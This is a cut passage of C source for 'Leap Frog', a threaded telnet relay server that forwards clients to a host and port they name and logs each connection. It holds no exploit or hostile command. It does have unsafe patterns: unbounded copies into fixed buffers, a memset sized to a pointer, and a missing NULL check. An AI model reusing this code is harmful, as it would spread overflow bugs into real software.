printf("SIGPIPE CAUGHT\n");
log_file("signals","SIGPIPE error ratts");
signal(SIGPIPE,sig_pipe);
return;
}
void sig_term(int crap)
{
if (VERBOSE)
printf("SIGTERM CAUGHT\n");
log_file("signals","SIGTERM error ratts");
signal(SIGTERM,sig_term);
return;
}
void init_signals()
{
signal(SIGPIPE, sig_pipe);
signal(SIGHUP, sig_exit);
signal(SIGINT, sig_exit);
signal(SIGQUIT, sig_exit);
signal(SIGILL, sig_exit);
signal(SIGTRAP, sig_exit);
signal(SIGIOT, sig_exit);
signal(SIGBUS, sig_exit);
signal(SIGFPE, sig_exit);
signal(SIGKILL, sig_kill);
signal(SIGSEGV, sig_segv);
signal(SIGALRM, sig_exit);
signal(SIGTERM, sig_term);
signal(SIGCHLD, sig_exit);
signal(SIGCONT, sig_exit);
signal(SIGSTOP, sig_exit);
signal(SIGTSTP, sig_exit);
signal(SIGTTIN, sig_exit);
signal(SIGTTOU, sig_exit);
signal(SIGURG, sig_exit);
signal(SIGXCPU, sig_exit);
signal(SIGXFSZ, sig_exit);
signal(SIGVTALRM, sig_exit);
signal(SIGPROF, sig_exit);
signal(SIGWINCH, sig_exit);
signal(SIGIO, sig_exit);
signal(SIGPWR, sig_exit);
}
// initilize the main socket
void init_socket(int port)
{
struct sockaddr_in main_socket, config_socket;
int dummy = 1,dummy_2=1,config_port;
char *hostname;
struct hostent *hp;
/* grab the main socket */
hostname=(char *)malloc(101);
RAMUSED+=sizeof(hostname);
bzero((char *)&main_socket, sizeof(struct sockaddr_in));
bzero((char *)&config_socket, sizeof(struct sockaddr_in));
gethostname(hostname,100);
hp=gethostbyname(hostname);
if ( hp == NULL)
{
printf("Error: Host machine does not exist!\n");
}
main_socket.sin_family=hp->h_addrtype;
main_socket.sin_port=htons(port);
config_socket.sin_family=hp->h_addrtype;
config_port=port+1;
config_socket.sin_port=htons(config_port);
main_descriptor = socket(AF_INET, SOCK_STREAM, IPROTO);
if (main_descriptor < 0)
{
printf("Couldn't grab main socket!!!\n");
exit(-1);
}
config_descriptor = socket(AF_INET, SOCK_STREAM, IPROTO);
if (config_descriptor < 0)
{
printf("Couldn't grab config socket!!!\n");
exit(-1);
}
if (setsockopt(main_descriptor, SOL_SOCKET, SO_REUSEADDR, (char *) &dummy,
sizeof(dummy)) < 0)
printf("Couldn't setsockopt() main\n");
if (setsockopt(config_descriptor, SOL_SOCKET, SO_REUSEADDR, (char *) &dummy_2,
sizeof(dummy_2)) < 0)
printf("Couldn't setsockopt() config\n");
// we do not need to set it non block but here is the code to do it att & bsd
/* flags=fcntl(main_descriptor,F_GETFL,0);
fcntl(main_descriptor,F_SETFL,O_NONBLOCK|flags);
if (ioctl(main_descriptor, FIONBIO, &dummy) < 0)
printf("Can't set non-blocking\n");
*/
if (bind(main_descriptor, (struct sockaddr *) & main_socket, sizeof(main_socket)) < 0)
{
if (VERBOSE)
printf("Couldn't bind main socket!!! ... check if something is already listening on that port!\n");
log_file("server","Couldn't bind main socket!!! ... check if something is alreadyn listening on that port!\n");
exit(-2);
}
if (bind(config_descriptor, (struct sockaddr *) & config_socket, sizeof(config_socket)) < 0)
{
if (VERBOSE)
printf("Couldn't bind config socket!!! ... check if something is already listening on that port!\n");
log_file("server","Couldn't bind config socket!!! ... check if something is alreadyn listening on that port!\n");
exit(-2);
}
if (listen(main_descriptor, 5) < 0)
printf("Listen refused main\n");
if (listen(config_descriptor, 5) < 0)
printf("Listen refused config\n");
pid=getpid();
(void)time(&timeval);
if (VERBOSE)
{
printf ("\n\nServer %s's main socket is set to receive on port - %d pid =%d\n", hostname,port,(int)pid);
printf("starting date and time %s \n",ctime(&timeval));
printf("\n\nServer Config socket is set to receive on port %d\n",port+1);
}
log_file("server","\n\nServer %s's main socket is set to receive on port - %d pid =%d\n", hostname,port,pid);
log_file("server","\n\nServer Config is set to receive on port %d\n",port+1);
log_file("server","starting date and time : %s \n",ctime(&timeval));
}
// config descriptor thread
void* configWatch(void* dummy)
{
pthread_t dummy_thr;
int accepted_socket;
int test,size;
struct sockaddr_in accept_addr;
struct player_t *passed_t;
struct hostent *addy;
fd_set read_set;
int ready_fd;
test=0;
// loop forever
for (;;)
{
/* wait for client to connect up */
// dont forget to zero out the set and reset what we are looking for every time we go into the loop
FD_ZERO(&read_set);
FD_SET(config_descriptor, &read_set);
// listen on the main socket and wait for someone to connect
// bc we are threaded block, non block is not important
do {
ready_fd= select(FD_SETSIZE, &read_set, NULL,NULL,NULL);
}
while (ready_fd<=0 || !FD_ISSET(config_descriptor, &read_set));
/* client has now connected */
/* pass a thread data structure to the thread instead of just the fd */
passed_t=(struct player_t *)malloc(sizeof(players_t));
RAMUSED+=sizeof(passed_t);
size = sizeof(accept_addr);
accepted_socket = accept(config_descriptor, (struct sockaddr*)&accept_addr, &size);
passed_t->socket=accepted_socket;
strcpy(passed_t->sin_addr,inet_ntoa(accept_addr.sin_addr));
addy=(void *)0;
addy = gethostbyaddr((char *) &(accept_addr.sin_addr.s_addr),
sizeof(accept_addr.sin_addr.s_addr), AF_INET);
if (addy)
passed_t->numerical_address = strdup(addy->h_name);
else
passed_t->numerical_address = passed_t->sin_addr;
/* your pid */
passed_t->pid=getpid();
/* create a new thread and pass the thread data structure we created to it..nice way to encapsulate data */
// we dont care about thread syncing per-se that is why we are not keeping track in any conventional manner
pthread_create(&dummy_thr, NULL, (void *) configClient, (struct player *) passed_t);
}
}
// main descriptor thread
void* serverWatch(void* dummy)
{
pthread_t dummy_thr;
int accepted_socket;
int test,size;
struct sockaddr_in accept_addr;
struct player_t *passed_t;
struct hostent *addy;
fd_set read_set;
int ready_fd;
test=0;
// loop forever
for (;;)
{
/* wait for client to connect up */
// dont forget to zero out the set and reset what we are looking for every time we go into the loop
FD_ZERO(&read_set);
FD_SET( main_descriptor, &read_set);
// listen on the main socket and wait for someone to connect
// bc we are threaded block, non block is not important
do {
ready_fd= select(FD_SETSIZE, &read_set, NULL,NULL,NULL);
}
while (ready_fd<=0 || !FD_ISSET(main_descriptor, &read_set));
/* client has now connected */
/* pass a thread data structure to the thread instead of just the fd */
passed_t=(struct player_t *)malloc(sizeof(players_t));
RAMUSED+=sizeof(passed_t);
size = sizeof(accept_addr);
accepted_socket = accept(main_descriptor, (struct sockaddr*)&accept_addr, &size);
passed_t->socket=accepted_socket;
strcpy(passed_t->sin_addr,inet_ntoa(accept_addr.sin_addr));
addy=(void *)0;
addy = gethostbyaddr((char *) &(accept_addr.sin_addr.s_addr),
sizeof(accept_addr.sin_addr.s_addr),
AF_INET);
if (addy)
passed_t->numerical_address = strdup(addy->h_name);
else
passed_t->numerical_address = passed_t->sin_addr;
/* your pid */
passed_t->pid=getpid();
/* create a new thread and pass the thread data structure we created to it..nice way to encapsulate data */
// we dont care about thread syncing per-se that is why we are not keeping track in any conventional manner
pthread_create(&dummy_thr, NULL, (void *) serverClient, (struct player *) passed_t);
}
}
/* config client to the socket for configuration issues */
void* configClient(struct player_t *p_t)
{
int dummy = 1;
struct frog *p;
time_t time_now;
char hostname[101];
char host_name[20];
int y,x;
int run_command;
logins++;
/* set non blocking of io */
if (ioctl(p_t->socket, FIONBIO, &dummy) < 0)
printf("Can't set non-blocking\n");
gethostname(hostname,100);
x=0;
while(x<strlen(hostname) && (hostname[x]!='.'))
host_name[x]=hostname[x++];
x=0;
p=(struct frog*)malloc(sizeof(FROG));
p->stack=(char *)malloc(200*sizeof(char));
p->totell=(char *)malloc(200*sizeof(char));
/* zero them out now */
memset(p, 0, sizeof(p));
p->flags=0;
/* get ip# and hostname if they have one */
strcpy(p->num_addr,p_t->sin_addr);
strncpy(p->inetaddr, p_t->numerical_address, 50 - 2);
(void *)p->socket=(void *)p_t->socket;
p->term=1;
p->oldstack=p->stack;
/* log every connection */
(void)time(&time_now);
log_file("config_logins","server name:%s inet addr:%s - %s",p->name,p->inetaddr,ctime(&time_now));
send_fd(p,"\n\n\t\t\t\tWelcome To ^GLeap Frog^N:\n");
send_fd(p,"\n\n\t\t^Gwww.cotse.com^N (^GC^Nhurch ^GO^Nf");
send_fd(p," ^GT^Nhe ^GS^Nwimming ^GE^Nlephant)\n\n");
send_fd(p,"\tNOTE: You have connected to the configuration utility\n");
send_fd(p,"\tThe New configuration (if it can be resolved) will be cached\n");
send_fd(p,"\tIf this is the first time you are connecting (resolved queries) will be cached\n");
send_fd(p,"\nPlease enter Server and port (default is 23) Followed by a carriage return\n");
send_fd(p,"Help is Available: type -> help\n");
send_fd(p,"Example foo.bar.com 4365\n\n");
run_command=0;
p->flags=0;
while(run_command>-1) {
send_fd(p,"Type In server and port to ^GLeap Frog^N To\n> ");
if(!(input(p)))
{
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
}
if (p->flags & PANIC)
{
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
}
x=0;
while(x<strlen(p->buffer) && p->buffer[x]!=' ')
p->name[x]=p->buffer[x++];
p->name[x]='\0';
if (!strcasecmp(p->name,"quit"))
{
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
}
// here is where you can check for commands a function would be better, but i will do it here for now
run_command=do_match(p,p->buffer,all);
if (run_command>-1)
execute_command(p, all, " ", run_command);
p->flags=0;
}
y=0;
while (x<strlen(p->buffer) && p->buffer[x]==' ')
x++;
while(x<strlen(p->buffer) && p->buffer[x]!=' ')
p->port[y++]=p->buffer[x++];
p->port[y]='\0';
p->remote_port=atoi(p->port);
if (p->remote_port==0)
p->remote_port=23;
SENDFD(p,"ok trying %s %d\nPlease Wait connecting\n",p->name,p->remote_port);
// now lets do the connection to the desired location
// we cannot let them log back into us
p->temp_long=inet_addr(p->name);
if (!(p->host_entry = gethostbyname(p->name)) &&
!(p->host_entry = gethostbyaddr((char *)&p->temp_long, 4, AF_INET))) {
if (p->name)
SENDFD(p,"The address %s you have given could not be resolved\n",p->name);
else
send_fd(p,"Could not resolve that address\n");
(void)time(&time_now);
log_file("failed_connect","addr:%s could not connect to %s - %s",p->inetaddr,(p->name ? p->name : "NO NAME"),ctime(&time_now));
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
}
p->host_entry_add=gethostbyaddr((char *)&p->temp_long, 4, AF_INET);
if (p->name)
{
if (!strcasecmp((char *)p->name, hostname) || !strcasecmp((char *)p->name,host_name) || !strcasecmp((char *)p->name,"localhost"))
{
SENDFD(p,"Sorry But you cannot connect back to me!\n");
(void)time(&time_now);
log_file("reconnect","server name:%s inet addr:%s attempted to reconnect to us - %s",p->name,p->inetaddr,ctime(&time_now));
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
}
}
else
if (!strcasecmp((char *)p->host_entry_add,p->inetaddr))
{
SENDFD(p,"Sorry But you cannot connect back to me!\n");
(void)time(&time_now);
log_file("reconnect","server name:%s inet addr:%s attempted to reconnect to us - %s",p->name,p->inetaddr,ctime(&time_now));
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
}
(void)time(&time_now);
log_file("login_attempt","server name:%s is attempting to connect to %s on port %d - %s",p->inetaddr,p->name,p->remote_port,ctime(&time_now));
if ((p->remote_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
SENDFD(p,"Ratts Could not get socket()\n");
(void)time(&time_now);
log_file("socket","Could not get socket - %s",ctime(&time_now));
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
}
p->remote_addr.sin_family = p->host_entry->h_addrtype;
p->remote_addr.sin_port = htons(p->remote_port);
memcpy(&p->remote_addr.sin_addr, p->host_entry->h_addr, p->host_entry->h_length);
p->address.sin_family=AF_INET;
p->address.sin_port=p->remote_port;
p->address.sin_addr=*(struct in_addr *)*p->host_entry->h_addr_list;
if (connect(p->remote_sock, (struct sockaddr *)&p->remote_addr, sizeof(p->remote_addr))) {
SENDFD(p,"Could not connect to %s on port %d\n",p->name,p->remote_port);
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
}
(void)time(&time_now);
// close this fd
close(p->remote_sock);
SENDFD(p,"Got A good connection to %s on port %d\n",p->name,p->remote_port);
if(read_modify_write(p)) {
send_fd(p,"Cached Data\n");
send_fd(p,"To get to the ^GLeap Frog^N\n");
SENDFD(p,"Type: ^Rtelnet %s %d^N\n",hostname,SERVERPORT);
}
else
send_fd(p,"Sorry could not update/add cache\n");
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
}
int input(struct frog *p)
{
double idle_out;
time_t time_now;
fd_set my_set; // select
static struct timeval timeout; // select call
int my_fd; // select
p->count=0;
p->idle=time((time_t *)0);
p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N);
while (!(p->flags & LAST_CHAR_WAS_N))
{
do {
FD_ZERO(&my_set);
FD_SET( p->socket, &my_set);
timeout.tv_sec=(long)0;
timeout.tv_usec=(long)3; // this seems like enough time
my_fd= select(FD_SETSIZE, &my_set, NULL,NULL,&timeout);
if ((idle_out=difftime(time((time_t *)0),p->idle))>30) // 30 secs before you idle out
{
(void)time(&time_now);
log_file("idle_out","server name:%s inet addr:%s idled out - %s",p->name,p->inetaddr,ctime(&time_now));
send_fd(p,"Sorry But you are not going to suck up a line on me 30sec idleout\n");
p->flags|=PANIC;
p->booted=1;
return -1;
}
}
while (my_fd<=0 || !FD_ISSET(p->socket, &my_set));
// stuf is wating now get it
get_input(p);
}
// just to tiddy up
p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N);
p->count=0;
return 1;
}
/* serve the client on the spec socket from thread call */
void* serverClient( struct player_t *p_t)
{
int count;
struct frog *p;
time_t time_now;
char buf[4096];
fd_set my_set; // select
static struct timeval timeout; // select call
int my_fd; // select
double idle_out;
int x,y;
int dummy = 1;
char hostname[101];
char host_name[20];
char stack[255];
int found=0;
logins++;
gethostname(hostname,100);
x=0;
while(x<strlen(hostname) && (hostname[x]!='.'))
host_name[x]=hostname[x++];
x=0;
/* set non blocking of io */
if (ioctl(p_t->socket, FIONBIO, &dummy) < 0)
printf("Can't set non-blocking\n");
count=1;
p=(struct frog*)malloc(sizeof(FROG));
p->stack=(char *)malloc(200*sizeof(char));
p->totell=(char *)malloc(200*sizeof(char));
/* zero them out now */
memset(p, 0, sizeof(p));
p->flags=0;
/* get ip# and hostname if they have one */
strcpy(p->num_addr,p_t->sin_addr);
strncpy(p->inetaddr, p_t->numerical_address, 50 - 2);
(void *)p->socket=(void *)p_t->socket;
p->term=1;
p->oldstack=p->stack;
/* log every connection */
(void)time(&time_now);
log_file("logins","server name:%s inet addr:%s - %s",p->name,p->inetaddr,ctime(&time_now));
// lets see if they have connected to us before
sprintf(stack,"%s/files/%s",ROOT,USERS_ADDRESS_FILE);
if (read_in(p))
{
found=1;
p->flags &= ~ _VERBOSE;
}
else
{
found=0;
p->flags |=_VERBOSE;
}
// my intro message
if (p->flags & _VERBOSE) {
SENDFD(p,"\t\t\t\tWelcome to ^GLeap Frog^N\n\n");
send_fd(p,"\n\n\t\t^Gwww.cotse.com^N (^GC^Nhurch ^GO^Nf");
send_fd(p," ^GT^Nhe ^GS^Nwimming ^GE^Nlephant)\n\n");
}
if (p->flags & _VERBOSE)
send_fd(p,"Enter Location and port (default is 23) to telnet to followed by enter.\nExample: foo.bar.com 8976\n> ");
// read data from session opened
p->count=0;
p->idle=time((time_t *)0);
p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N);
if (!found) {
while (!(p->flags & LAST_CHAR_WAS_N))
{
do {
FD_ZERO(&my_set);
FD_SET( p->socket, &my_set);
timeout.tv_sec=(long)0;
timeout.tv_usec=(long)3; // this seems like enough time
my_fd= select(FD_SETSIZE, &my_set, NULL,NULL,&timeout);
if ((idle_out=difftime(time((time_t *)0),p->idle))>30) // 30 secs before you idle out
{
(void)time(&time_now);
log_file("idle_out","server name:%s inet addr:%s idled out - %s",p->name,p->inetaddr,ctime(&time_now));
send_fd(p,"Sorry But you are not going to suck up a line on me 30sec idleout\n");
p->flags|=PANIC;
p->booted=1;
free(p->stack);
free(p->totell);
free(p);
close(p_t->socket);
pthread_exit(NULL);
return 0;
break;
}
}
while (my_fd<=0 || !FD_ISSET(p->socket, &my_set));
// ok now get the input from the fd
get_input(p);
}
// just to tiddy up
p->flags &= ~(LAST_CHAR_WAS_R | LAST_CHAR_WAS_N);
p->count=0;
// get the host/port now
x=0;
while(x<strlen(p->buffer) && p->buffer[x]!=' ')
p->name[x]=p->buffer[x++];
p->name[x]='\0';
y=0;
while (x<strlen(p->buffer) && p->buffer[x]==' ')
x++;
while(x<strlen(p->buffer) && p->buffer[x]!=' ')
p->port[y++]=p->buffer[x++];
p->port[y]='\0';
p->remote_port=atoi(p->port);
if (p->remote_port==0)
p->remote_port=23;
} // end of not found
// now lets resolve the desired address
// we cannot let them log back into us
p->temp_long=inet_addr(p->name);
if (!(p->host_entry = gethostbyname(p->name)) &&
!(p->host_entry = gethostbyaddr((char *)&p->temp_long, 4, AF_INET))) {
if (p->name)
SENDFD(p,"The address %s you have given could not be resolved\n",p